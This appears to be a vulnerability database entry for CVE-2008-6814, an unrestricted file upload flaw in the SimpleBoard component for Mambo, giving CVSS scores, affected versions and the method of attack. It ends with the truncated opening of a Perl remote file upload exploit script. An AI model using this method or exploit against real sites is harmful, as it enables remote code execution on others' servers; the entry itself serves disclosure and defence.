6.8
CVSSv2

CVE-2008-6814

Published: 28/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in image_upload.php in the SimpleBoard (com_simpleboard) component 1.0.1 and previous versions for Mambo allows remote malicious users to execute arbitrary code by uploading a file with an executable extension and an image/jpeg content type, then accessing this file via a direct request to the file in components/com_simpleboard/, a different vulnerability than CVE-2006-3528.

Vulnerable Product Search on Vulmon Subscribe to Product

jan de graaff com simpleboard

jan de graaff com simpleboard 0.9

jan de graaff com simpleboard 0.9.1

jan de graaff com simpleboard 0.9.2

jan de graaff com simpleboard 1.0

Exploits

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(99999) "php"; # no int() print <<INTRO; - SimpleBoard Mambo Component <= 101 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discovered on: 20 October 2008 Vendor has not be ...